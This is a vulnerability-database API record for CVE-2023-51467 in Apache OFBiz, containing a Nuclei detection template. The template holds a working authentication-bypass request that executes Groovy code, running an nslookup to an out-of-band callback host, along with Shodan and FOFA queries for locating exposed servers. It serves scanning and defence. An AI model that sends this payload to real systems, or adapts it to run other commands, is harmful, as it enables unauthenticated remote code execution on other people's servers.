{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-51467/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-51467/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-51467/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-51467/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-51467/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-51467"},"sightings":{"href":"/api/v1/sightings/cve-2023-51467"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-51467.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-51467\n\ninfo:\n  name: Apache OFBiz < 18.12.11 - Remote Code Execution\n  author: your3cho\n  severity: critical\n  description: |\n    The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n  impact: |\n    Unauthenticated attackers can bypass authentication and execute arbitrary Groovy code, leading to remote code execution and complete system compromise.\n  remediation: |\n    Upgrade Apache OFBiz to version 18.12.11 or later.\n  reference:\n    - https://lists.apache.org/thread/9tmf9qyyhgh6m052rhz7lg9vxn390bdv\n    - https://www.openwall.com/lists/oss-security/2023/12/26/3\n    - https://twitter.com/_0xf4n9x_/status/1740202435367543183\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-51467\n    - https://issues.apache.org/jira/browse/OFBIZ-12873\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-51467\n    cwe-id: CWE-918\n    epss-score: 0.96001\n    epss-percentile: 0.99874\n    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: apache\n    product: ofbiz\n    shodan-query:\n      - html:\"OFBiz\"\n      - http.html:\"ofbiz\"\n      - ofbiz.visitor=\n    fofa-query:\n      - app=\"Apache_OFBiz\"\n      - body=\"ofbiz\"\n      - app=\"apache_ofbiz\"\n  tags: cve2023,cve,apache,ofbiz,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        groovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: header\n        words:\n          - 'OFBiz.Visitor='\n# digest: 490a004630440220734187702f7d4179898d00aa37509b95483f5ddb4bc89bf49ae5c3e706ad878702201ef449f60c29d2a4e9a5e753e16a4e7c9d3d575c29da321d8ce11c36ace88fab:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2023-51467"}